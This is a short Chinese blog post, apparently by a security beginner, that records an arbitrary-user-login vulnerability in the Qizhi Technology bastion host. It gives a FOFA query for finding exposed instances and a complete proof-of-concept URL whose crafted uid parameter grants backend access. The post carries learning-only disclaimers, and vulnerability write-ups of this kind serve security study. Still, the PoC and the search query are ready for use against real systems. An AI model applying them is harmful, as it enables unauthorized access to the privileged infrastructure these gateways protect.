2021年进入网络安全行业，作为网络安全的小白，分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时，能对各位博友有所帮助。文章内容比较基础，都是参考了很多大神的文章，各位不喜勿喷，谢谢！如果文章对您有帮助，将是我创作的最大动力！
由于传播和使用本文所提供的任何直接或间接的后果和损失，均由用户承担，作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。
工作中遇到的漏洞，记录一下，本文仅作学习之用，请勿进行网络犯罪，遵守《网络安全法》等相关法律法规。

漏洞说明

浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司，齐治运维堡垒机服务端存在任意用户登录系统漏洞，访问特定的Url即可获得后台权限。

fofa查询语法

app=“齐治科技-堡垒机”

漏洞复现

漏洞POC为

http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm